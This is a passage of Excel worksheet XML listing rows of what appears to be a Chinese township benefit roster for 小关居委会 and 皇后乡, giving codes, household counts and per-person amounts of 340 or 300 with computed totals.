        <v>小关居委会三组</v>
      </c>
      <c r="D1810" s="57" t="s">
        <v>4826</v>
      </c>
      <c r="E1810" s="57" t="s">
        <v>4827</v>
      </c>
      <c r="F1810" s="14" t="str">
        <f>F1809</f>
        <v>4113210521</v>
      </c>
      <c r="G1810" s="14"/>
      <c r="H1810" s="14"/>
      <c r="I1810" s="14"/>
      <c r="J1810" s="14"/>
      <c r="K1810" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1811" ht="23" customHeight="1" spans="1:11">
      <c r="A1811" s="13" t="s">
        <v>4828</v>
      </c>
      <c r="B1811" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1811" s="14" t="s">
        <v>4829</v>
      </c>
      <c r="D1811" s="14" t="s">
        <v>4830</v>
      </c>
      <c r="E1811" s="14" t="s">
        <v>3760</v>
      </c>
      <c r="F1811" s="14" t="s">
        <v>4319</v>
      </c>
      <c r="G1811" s="14">
        <v>1</v>
      </c>
      <c r="H1811" s="14">
        <v>340</v>
      </c>
      <c r="I1811" s="14">
        <f t="shared" ref="I1811:I1831" si="98">H1811*G1811</f>
        <v>340</v>
      </c>
      <c r="J1811" s="14" t="s">
        <v>4822</v>
      </c>
      <c r="K1811" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1812" ht="23" customHeight="1" spans="1:11">
      <c r="A1812" s="13" t="s">
        <v>4831</v>
      </c>
      <c r="B1812" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1812" s="14" t="s">
        <v>4832</v>
      </c>
      <c r="D1812" s="14" t="s">
        <v>4833</v>
      </c>
      <c r="E1812" s="14" t="s">
        <v>4021</v>
      </c>
      <c r="F1812" s="14" t="s">
        <v>3693</v>
      </c>
      <c r="G1812" s="14">
        <v>1</v>
      </c>
      <c r="H1812" s="14">
        <v>340</v>
      </c>
      <c r="I1812" s="14">
        <f t="shared" si="98"/>
        <v>340</v>
      </c>
      <c r="J1812" s="14" t="s">
        <v>4822</v>
      </c>
      <c r="K1812" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1813" ht="23" customHeight="1" spans="1:11">
      <c r="A1813" s="13" t="s">
        <v>4834</v>
      </c>
      <c r="B1813" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1813" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1813" s="14" t="s">
        <v>4835</v>
      </c>
      <c r="E1813" s="14" t="s">
        <v>3904</v>
      </c>
      <c r="F1813" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1813" s="14">
        <v>1</v>
      </c>
      <c r="H1813" s="14">
        <v>340</v>
      </c>
      <c r="I1813" s="14">
        <f t="shared" si="98"/>
        <v>340</v>
      </c>
      <c r="J1813" s="14" t="s">
        <v>4822</v>
      </c>
      <c r="K1813" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1814" ht="23" customHeight="1" spans="1:11">
      <c r="A1814" s="13" t="s">
        <v>4836</v>
      </c>
      <c r="B1814" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1814" s="14" t="s">
        <v>4307</v>
      </c>
      <c r="D1814" s="14" t="s">
        <v>4837</v>
      </c>
      <c r="E1814" s="14" t="s">
        <v>3727</v>
      </c>
      <c r="F1814" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1814" s="14">
        <v>1</v>
      </c>
      <c r="H1814" s="14">
        <v>340</v>
      </c>
      <c r="I1814" s="14">
        <f t="shared" si="98"/>
        <v>340</v>
      </c>
      <c r="J1814" s="14" t="s">
        <v>4838</v>
      </c>
      <c r="K1814" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1815" ht="23" customHeight="1" spans="1:11">
      <c r="A1815" s="13" t="s">
        <v>4839</v>
      </c>
      <c r="B1815" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1815" s="14" t="s">
        <v>4840</v>
      </c>
      <c r="D1815" s="14" t="s">
        <v>4841</v>
      </c>
      <c r="E1815" s="14" t="s">
        <v>4842</v>
      </c>
      <c r="F1815" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1815" s="14">
        <v>1</v>
      </c>
      <c r="H1815" s="14">
        <v>340</v>
      </c>
      <c r="I1815" s="14">
        <f t="shared" si="98"/>
        <v>340</v>
      </c>
      <c r="J1815" s="14" t="s">
        <v>4838</v>
      </c>
      <c r="K1815" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1816" ht="23" customHeight="1" spans="1:11">
      <c r="A1816" s="13" t="s">
        <v>4843</v>
      </c>
      <c r="B1816" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1816" s="14" t="s">
        <v>4307</v>
      </c>
      <c r="D1816" s="14" t="s">
        <v>4844</v>
      </c>
      <c r="E1816" s="14" t="s">
        <v>3769</v>
      </c>
      <c r="F1816" s="14" t="s">
        <v>3693</v>
      </c>
      <c r="G1816" s="14">
        <v>1</v>
      </c>
      <c r="H1816" s="14">
        <v>340</v>
      </c>
      <c r="I1816" s="14">
        <f t="shared" si="98"/>
        <v>340</v>
      </c>
      <c r="J1816" s="14" t="s">
        <v>4845</v>
      </c>
      <c r="K1816" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1817" ht="23" customHeight="1" spans="1:11">
      <c r="A1817" s="13" t="s">
        <v>4846</v>
      </c>
      <c r="B1817" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1817" s="14" t="s">
        <v>4847</v>
      </c>
      <c r="D1817" s="14" t="s">
        <v>4848</v>
      </c>
      <c r="E1817" s="14" t="s">
        <v>3888</v>
      </c>
      <c r="F1817" s="14" t="s">
        <v>4849</v>
      </c>
      <c r="G1817" s="14">
        <v>1</v>
      </c>
      <c r="H1817" s="14">
        <v>340</v>
      </c>
      <c r="I1817" s="14">
        <f t="shared" si="98"/>
        <v>340</v>
      </c>
      <c r="J1817" s="14" t="s">
        <v>4850</v>
      </c>
      <c r="K1817" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1818" ht="23" customHeight="1" spans="1:11">
      <c r="A1818" s="13" t="s">
        <v>4851</v>
      </c>
      <c r="B1818" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1818" s="14" t="s">
        <v>4852</v>
      </c>
      <c r="D1818" s="14" t="s">
        <v>4853</v>
      </c>
      <c r="E1818" s="14" t="s">
        <v>3683</v>
      </c>
      <c r="F1818" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1818" s="14">
        <v>1</v>
      </c>
      <c r="H1818" s="14">
        <v>340</v>
      </c>
      <c r="I1818" s="14">
        <f t="shared" si="98"/>
        <v>340</v>
      </c>
      <c r="J1818" s="24">
        <v>45474</v>
      </c>
      <c r="K1818" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1819" ht="23" customHeight="1" spans="1:11">
      <c r="A1819" s="13" t="s">
        <v>4854</v>
      </c>
      <c r="B1819" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1819" s="57" t="s">
        <v>4307</v>
      </c>
      <c r="D1819" s="58" t="s">
        <v>4855</v>
      </c>
      <c r="E1819" s="58" t="s">
        <v>3706</v>
      </c>
      <c r="F1819" s="14" t="s">
        <v>4849</v>
      </c>
      <c r="G1819" s="14">
        <v>1</v>
      </c>
      <c r="H1819" s="14">
        <v>340</v>
      </c>
      <c r="I1819" s="14">
        <f t="shared" si="98"/>
        <v>340</v>
      </c>
      <c r="J1819" s="57" t="s">
        <v>4856</v>
      </c>
      <c r="K1819" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1820" ht="23" customHeight="1" spans="1:11">
      <c r="A1820" s="13" t="s">
        <v>4857</v>
      </c>
      <c r="B1820" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1820" s="59" t="s">
        <v>4858</v>
      </c>
      <c r="D1820" s="60" t="s">
        <v>4859</v>
      </c>
      <c r="E1820" s="61" t="s">
        <v>3794</v>
      </c>
      <c r="F1820" s="30" t="s">
        <v>3673</v>
      </c>
      <c r="G1820" s="14">
        <v>1</v>
      </c>
      <c r="H1820" s="14">
        <v>340</v>
      </c>
      <c r="I1820" s="14">
        <f t="shared" si="98"/>
        <v>340</v>
      </c>
      <c r="J1820" s="57" t="s">
        <v>4856</v>
      </c>
      <c r="K1820" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1821" ht="23" customHeight="1" spans="1:11">
      <c r="A1821" s="13" t="s">
        <v>4860</v>
      </c>
      <c r="B1821" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1821" s="62" t="s">
        <v>4861</v>
      </c>
      <c r="D1821" s="54" t="s">
        <v>4862</v>
      </c>
      <c r="E1821" s="54" t="s">
        <v>3956</v>
      </c>
      <c r="F1821" s="63" t="s">
        <v>3693</v>
      </c>
      <c r="G1821" s="14">
        <v>1</v>
      </c>
      <c r="H1821" s="14">
        <v>340</v>
      </c>
      <c r="I1821" s="14">
        <f t="shared" si="98"/>
        <v>340</v>
      </c>
      <c r="J1821" s="66" t="s">
        <v>4856</v>
      </c>
      <c r="K1821" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1822" ht="23" customHeight="1" spans="1:11">
      <c r="A1822" s="13" t="s">
        <v>4863</v>
      </c>
      <c r="B1822" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1822" s="62" t="s">
        <v>4832</v>
      </c>
      <c r="D1822" s="54" t="s">
        <v>4864</v>
      </c>
      <c r="E1822" s="54" t="s">
        <v>4865</v>
      </c>
      <c r="F1822" s="63" t="s">
        <v>3693</v>
      </c>
      <c r="G1822" s="14">
        <v>1</v>
      </c>
      <c r="H1822" s="14">
        <v>340</v>
      </c>
      <c r="I1822" s="14">
        <f t="shared" si="98"/>
        <v>340</v>
      </c>
      <c r="J1822" s="57" t="s">
        <v>4866</v>
      </c>
      <c r="K1822" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1823" ht="23" customHeight="1" spans="1:11">
      <c r="A1823" s="13" t="s">
        <v>4867</v>
      </c>
      <c r="B1823" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1823" s="62" t="s">
        <v>4868</v>
      </c>
      <c r="D1823" s="54" t="s">
        <v>4869</v>
      </c>
      <c r="E1823" s="54" t="s">
        <v>4870</v>
      </c>
      <c r="F1823" s="63" t="s">
        <v>4871</v>
      </c>
      <c r="G1823" s="14">
        <v>1</v>
      </c>
      <c r="H1823" s="14">
        <v>340</v>
      </c>
      <c r="I1823" s="14">
        <f t="shared" si="98"/>
        <v>340</v>
      </c>
      <c r="J1823" s="57" t="s">
        <v>4866</v>
      </c>
      <c r="K1823" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1824" ht="23" customHeight="1" spans="1:11">
      <c r="A1824" s="13" t="s">
        <v>4872</v>
      </c>
      <c r="B1824" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1824" s="62" t="s">
        <v>4802</v>
      </c>
      <c r="D1824" s="54" t="s">
        <v>4873</v>
      </c>
      <c r="E1824" s="54" t="s">
        <v>4874</v>
      </c>
      <c r="F1824" s="63" t="s">
        <v>3707</v>
      </c>
      <c r="G1824" s="14">
        <v>1</v>
      </c>
      <c r="H1824" s="14">
        <v>340</v>
      </c>
      <c r="I1824" s="14">
        <f t="shared" si="98"/>
        <v>340</v>
      </c>
      <c r="J1824" s="57" t="s">
        <v>4866</v>
      </c>
      <c r="K1824" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1825" ht="23" customHeight="1" spans="1:11">
      <c r="A1825" s="13" t="s">
        <v>4875</v>
      </c>
      <c r="B1825" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1825" s="14" t="s">
        <v>4832</v>
      </c>
      <c r="D1825" s="14" t="s">
        <v>4876</v>
      </c>
      <c r="E1825" s="14" t="s">
        <v>3773</v>
      </c>
      <c r="F1825" s="14" t="s">
        <v>3693</v>
      </c>
      <c r="G1825" s="14">
        <v>1</v>
      </c>
      <c r="H1825" s="14">
        <v>340</v>
      </c>
      <c r="I1825" s="14">
        <f t="shared" si="98"/>
        <v>340</v>
      </c>
      <c r="J1825" s="24">
        <v>45474</v>
      </c>
      <c r="K1825" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1826" ht="23" customHeight="1" spans="1:11">
      <c r="A1826" s="13" t="s">
        <v>4877</v>
      </c>
      <c r="B1826" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1826" s="14" t="s">
        <v>4878</v>
      </c>
      <c r="D1826" s="14" t="s">
        <v>4879</v>
      </c>
      <c r="E1826" s="14" t="s">
        <v>2020</v>
      </c>
      <c r="F1826" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1826" s="14">
        <v>1</v>
      </c>
      <c r="H1826" s="14">
        <v>340</v>
      </c>
      <c r="I1826" s="14">
        <f t="shared" si="98"/>
        <v>340</v>
      </c>
      <c r="J1826" s="24">
        <v>45658</v>
      </c>
      <c r="K1826" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1827" ht="23" customHeight="1" spans="1:11">
      <c r="A1827" s="13" t="s">
        <v>4880</v>
      </c>
      <c r="B1827" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1827" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1827" s="14" t="s">
        <v>4881</v>
      </c>
      <c r="E1827" s="14" t="s">
        <v>4452</v>
      </c>
      <c r="F1827" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1827" s="14">
        <v>1</v>
      </c>
      <c r="H1827" s="14">
        <v>340</v>
      </c>
      <c r="I1827" s="14">
        <f t="shared" si="98"/>
        <v>340</v>
      </c>
      <c r="J1827" s="24">
        <v>45717</v>
      </c>
      <c r="K1827" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1828" ht="23" customHeight="1" spans="1:11">
      <c r="A1828" s="13" t="s">
        <v>4882</v>
      </c>
      <c r="B1828" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1828" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1828" s="14" t="s">
        <v>4883</v>
      </c>
      <c r="E1828" s="14" t="s">
        <v>4884</v>
      </c>
      <c r="F1828" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1828" s="14">
        <v>1</v>
      </c>
      <c r="H1828" s="14">
        <v>340</v>
      </c>
      <c r="I1828" s="14">
        <f t="shared" si="98"/>
        <v>340</v>
      </c>
      <c r="J1828" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1828" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1829" s="4" customFormat="1" ht="23" customHeight="1" spans="1:11">
      <c r="A1829" s="13" t="s">
        <v>4885</v>
      </c>
      <c r="B1829" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1829" s="64" t="s">
        <v>4307</v>
      </c>
      <c r="D1829" s="65" t="s">
        <v>4886</v>
      </c>
      <c r="E1829" s="65" t="s">
        <v>4077</v>
      </c>
      <c r="F1829" s="63" t="s">
        <v>3707</v>
      </c>
      <c r="G1829" s="14">
        <v>1</v>
      </c>
      <c r="H1829" s="14">
        <v>340</v>
      </c>
      <c r="I1829" s="14">
        <f t="shared" si="98"/>
        <v>340</v>
      </c>
      <c r="J1829" s="67" t="s">
        <v>3172</v>
      </c>
      <c r="K1829" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1830" ht="23" customHeight="1" spans="1:11">
      <c r="A1830" s="13" t="s">
        <v>4887</v>
      </c>
      <c r="B1830" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1830" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1830" s="14" t="s">
        <v>4888</v>
      </c>
      <c r="E1830" s="14" t="s">
        <v>4889</v>
      </c>
      <c r="F1830" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1830" s="14">
        <v>1</v>
      </c>
      <c r="H1830" s="14">
        <v>340</v>
      </c>
      <c r="I1830" s="14">
        <f t="shared" si="98"/>
        <v>340</v>
      </c>
      <c r="J1830" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1830" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1831" ht="23" customHeight="1" spans="1:11">
      <c r="A1831" s="13" t="s">
        <v>4890</v>
      </c>
      <c r="B1831" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1831" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1831" s="14" t="s">
        <v>4892</v>
      </c>
      <c r="E1831" s="14" t="s">
        <v>4893</v>
      </c>
      <c r="F1831" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1831" s="14">
        <v>2</v>
      </c>
      <c r="H1831" s="14">
        <v>300</v>
      </c>
      <c r="I1831" s="14">
        <f t="shared" si="98"/>
        <v>600</v>
      </c>
      <c r="J1831" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1831" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1832" ht="23" customHeight="1" spans="1:11">
      <c r="A1832" s="13" t="s">
        <v>4895</v>
      </c>
      <c r="B1832" s="14" t="str">
        <f>B1831</f>
        <v>皇后乡</v>
      </c>
      <c r="C1832" s="14" t="str">
        <f>C1831</f>
        <v>皇后乡</v>
      </c>
      <c r="D1832" s="13" t="s">
        <v>4896</v>
      </c>
      <c r="E1832" s="13" t="s">
        <v>4897</v>
      </c>
      <c r="F1832" s="14" t="str">
        <f>F1831</f>
        <v>4113210615</v>
      </c>
      <c r="G1832" s="14"/>
      <c r="H1832" s="14"/>
      <c r="I1832" s="14"/>
      <c r="J1832" s="14"/>
      <c r="K1832" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1833" ht="23" customHeight="1" spans="1:11">
      <c r="A1833" s="13" t="s">
        <v>4898</v>
      </c>
      <c r="B1833" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1833" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1833" s="14" t="s">
        <v>4899</v>
      </c>
      <c r="E1833" s="14" t="s">
        <v>4900</v>
      </c>
      <c r="F1833" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1833" s="14">
        <v>1</v>
      </c>
      <c r="H1833" s="14">
        <v>340</v>
      </c>
      <c r="I1833" s="14">
        <f>H1833*G1833</f>
        <v>340</v>
      </c>
      <c r="J1833" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1833" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1834" ht="23" customHeight="1" spans="1:11">
      <c r="A1834" s="13" t="s">
        <v>4901</v>
      </c>
      <c r="B1834" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1834" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1834" s="14" t="s">
        <v>4902</v>
      </c>
      <c r="E1834" s="14" t="s">
        <v>2243</v>
      </c>
      <c r="F1834" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1834" s="14">
        <v>2</v>
      </c>
      <c r="H1834" s="14">
        <v>300</v>
      </c>
      <c r="I1834" s="14">
        <f>H1834*G1834</f>
        <v>600</v>
      </c>
      <c r="J1834" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1834" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1835" ht="23" customHeight="1" spans="1:11">
      <c r="A1835" s="13" t="s">
        <v>4903</v>
      </c>
      <c r="B1835" s="14" t="str">
        <f>B1834</f>
        <v>皇后乡</v>
      </c>
      <c r="C1835" s="14" t="str">
        <f>C1834</f>
        <v>皇后乡</v>
      </c>
      <c r="D1835" s="13" t="s">
        <v>4904</v>
      </c>
      <c r="E1835" s="13" t="s">
        <v>4905</v>
      </c>
      <c r="F1835" s="14" t="str">
        <f>F1834</f>
        <v>4113210615</v>
      </c>
      <c r="G1835" s="14"/>
      <c r="H1835" s="14"/>
      <c r="I1835" s="14"/>
      <c r="J1835" s="14"/>
      <c r="K1835" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1836" ht="23" customHeight="1" spans="1:11">
      <c r="A1836" s="13" t="s">
        <v>4906</v>
      </c>
      <c r="B1836" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1836" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1836" s="14" t="s">
        <v>4907</v>
      </c>
      <c r="E1836" s="14" t="s">
        <v>4908</v>
      </c>
      <c r="F1836" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1836" s="14">
        <v>2</v>
      </c>
      <c r="H1836" s="14">
        <v>300</v>
      </c>
      <c r="I1836" s="14">
        <f>H1836*G1836</f>
        <v>600</v>
      </c>
      <c r="J1836" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1836" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1837" ht="23" customHeight="1" spans="1:11">
      <c r="A1837" s="13" t="s">
        <v>4909</v>
      </c>
      <c r="B1837" s="14" t="str">
        <f>B1836</f>
        <v>皇后乡</v>
      </c>
      <c r="C1837" s="14" t="str">
        <f>C1836</f>
        <v>皇后乡</v>
      </c>
      <c r="D1837" s="13" t="s">
        <v>4910</v>
      </c>
      <c r="E1837" s="13" t="s">
        <v>4911</v>
      </c>
      <c r="F1837" s="14" t="str">
        <f>F1836</f>
        <v>4113210615</v>
      </c>
      <c r="G1837" s="14"/>
      <c r="H1837" s="14"/>
      <c r="I1837" s="14"/>
      <c r="J1837" s="14"/>
      <c r="K1837" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1838" ht="23" customHeight="1" spans="1:11">
      <c r="A1838" s="13" t="s">
        <v>4912</v>
      </c>
      <c r="B1838" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1838" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1838" s="14" t="s">
        <v>4913</v>
      </c>
      <c r="E1838" s="14" t="s">
        <v>4914</v>
      </c>
      <c r="F1838" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1838" s="14">
        <v>1</v>
      </c>
      <c r="H1838" s="14">
        <v>340</v>
      </c>
      <c r="I1838" s="14">
        <f t="shared" ref="I1838:I1844" si="99">H1838*G1838</f>
        <v>340</v>
      </c>
      <c r="J1838" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1838" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1839" ht="23" customHeight="1" spans="1:11">
      <c r="A1839" s="13" t="s">
        <v>4915</v>
      </c>
      <c r="B1839" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1839" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1839" s="14" t="s">
        <v>3852</v>
      </c>
      <c r="E1839" s="14" t="s">
        <v>4916</v>
      </c>
      <c r="F1839" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1839" s="14">
        <v>1</v>
      </c>
      <c r="H1839" s="14">
        <v>340</v>
      </c>
      <c r="I1839" s="14">
        <f t="shared" si="99"/>
        <v>340</v>
      </c>
      <c r="J1839" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1839" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1840" ht="23" customHeight="1" spans="1:11">
      <c r="A1840" s="13" t="s">
        <v>4917</v>
      </c>
      <c r="B1840" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1840" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1840" s="14" t="s">
        <v>4918</v>
      </c>
      <c r="E1840" s="14" t="s">
        <v>4919</v>
      </c>
      <c r="F1840" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1840" s="14">
        <v>1</v>
      </c>
      <c r="H1840" s="14">
        <v>340</v>
      </c>
      <c r="I1840" s="14">
        <f t="shared" si="99"/>
        <v>340</v>
      </c>
      <c r="J1840" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1840" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1841" ht="23" customHeight="1" spans="1:11">
      <c r="A1841" s="13" t="s">
        <v>4920</v>
      </c>
      <c r="B1841" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1841" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1841" s="14" t="s">
        <v>4921</v>
      </c>
      <c r="E1841" s="14" t="s">
        <v>4922</v>
      </c>
      <c r="F1841" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1841" s="14">
        <v>1</v>
      </c>
      <c r="H1841" s="14">
        <v>340</v>
      </c>
      <c r="I1841" s="14">
        <f t="shared" si="99"/>
        <v>340</v>
      </c>
      <c r="J1841" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1841" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1842" ht="23" customHeight="1" spans="1:11">
      <c r="A1842" s="13" t="s">
        <v>4923</v>
      </c>
      <c r="B1842" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1842" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1842" s="14" t="s">
        <v>4924</v>
      </c>
      <c r="E1842" s="14" t="s">
        <v>2243</v>
      </c>
      <c r="F1842" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1842" s="14">
        <v>1</v>
      </c>
      <c r="H1842" s="14">
        <v>340</v>
      </c>
      <c r="I1842" s="14">
        <f t="shared" si="99"/>
        <v>340</v>
      </c>
      <c r="J1842" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1842" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1843" ht="23" customHeight="1" spans="1:11">
      <c r="A1843" s="13" t="s">
        <v>4925</v>
      </c>
      <c r="B1843" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1843" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1843" s="14" t="s">
        <v>4926</v>
      </c>
      <c r="E1843" s="14" t="s">
        <v>4927</v>
      </c>
      <c r="F1843" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1843" s="14">
        <v>1</v>
      </c>
      <c r="H1843" s="14">
        <v>340</v>
      </c>
      <c r="I1843" s="14">
        <f t="shared" si="99"/>
        <v>340</v>
      </c>
      <c r="J1843" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1843" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1844" ht="23" customHeight="1" spans="1:11">
      <c r="A1844" s="13" t="s">
        <v>4928</v>
      </c>
      <c r="B1844" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1844" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1844" s="14" t="s">
        <v>4929</v>
      </c>
      <c r="E1844" s="14" t="s">
        <v>4930</v>
      </c>
      <c r="F1844" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1844" s="14">
        <v>2</v>
      </c>
      <c r="H1844" s="14">
        <v>300</v>
      </c>
      <c r="I1844" s="14">
        <f t="shared" si="99"/>
        <v>600</v>
      </c>
      <c r="J1844" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1844" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1845" ht="23" customHeight="1" spans="1:11">
      <c r="A1845" s="13" t="s">
        <v>4931</v>
      </c>
      <c r="B1845" s="14" t="str">
        <f>B1844</f>
        <v>皇后乡</v>
      </c>
      <c r="C1845" s="14" t="str">
        <f>C1844</f>
        <v>皇后乡</v>
      </c>
      <c r="D1845" s="13" t="s">
        <v>4932</v>
      </c>
      <c r="E1845" s="13" t="s">
        <v>4933</v>
      </c>
      <c r="F1845" s="14" t="str">
        <f>F1844</f>
        <v>4113210615</v>
      </c>
      <c r="G1845" s="14"/>
      <c r="H1845" s="14"/>
      <c r="I1845" s="14"/>
      <c r="J1845" s="14"/>
      <c r="K1845" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1846" ht="23" customHeight="1" spans="1:11">
      <c r="A1846" s="13" t="s">
        <v>4934</v>
      </c>
      <c r="B1846" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1846" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1846" s="14" t="s">
        <v>4935</v>
      </c>
      <c r="E1846" s="14" t="s">
        <v>4936</v>
      </c>
      <c r="F1846" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1846" s="14">
        <v>1</v>
      </c>
      <c r="H1846" s="14">
        <v>340</v>
      </c>
      <c r="I1846" s="14">
        <f>H1846*G1846</f>
        <v>340</v>
      </c>
      <c r="J1846" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1846" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1847" ht="23" customHeight="1" spans="1:11">
      <c r="A1847" s="13" t="s">
        <v>4937</v>
      </c>
      <c r="B1847" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1847" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1847" s="14" t="s">
        <v>4938</v>
      </c>
      <c r="E1847" s="14" t="s">
        <v>4939</v>
      </c>
      <c r="F1847" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1847" s="14">
        <v>1</v>
      </c>
      <c r="H1847" s="14">
        <v>340</v>
      </c>
      <c r="I1847" s="14">
        <f>H1847*G1847</f>
        <v>340</v>
      </c>
      <c r="J1847" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1847" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1848" ht="23" customHeight="1" spans="1:11">
      <c r="A1848" s="13" t="s">
        <v>4940</v>
      </c>
      <c r="B1848" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1848" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1848" s="14" t="s">
        <v>4941</v>
      </c>
      <c r="E1848" s="14" t="s">
        <v>4942</v>
      </c>
      <c r="F1848" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1848" s="14">
